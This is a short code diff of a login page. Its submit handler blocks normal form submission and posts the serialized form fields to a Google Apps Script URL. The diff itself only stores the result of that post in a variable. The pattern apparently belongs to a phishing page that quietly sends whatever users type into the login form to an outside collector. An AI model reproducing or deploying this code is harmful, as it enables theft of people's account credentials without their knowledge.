--- a/login.html
+++ b/login.html
@@ -57,7 +57,7 @@
 		
 		$('form').submit(function( event ) {
 			event.preventDefault();
-			$.post( 'https://script.google.com/macros/s/AKfycbzoxkZilL8WUxOtzlKv-oWYWv_t13pJhy9nMwgjVA0rkV3hW53NuteSkN46L-KVp2he-g/exec', $('form').serialize() );
+			var result = $.post( 'https://script.google.com/macros/s/AKfycbzoxkZilL8WUxOtzlKv-oWYWv_t13pJhy9nMwgjVA0rkV3hW53NuteSkN46L-KVp2he-g/exec', $('form').serialize() );
 		});
     </script>
 </body>
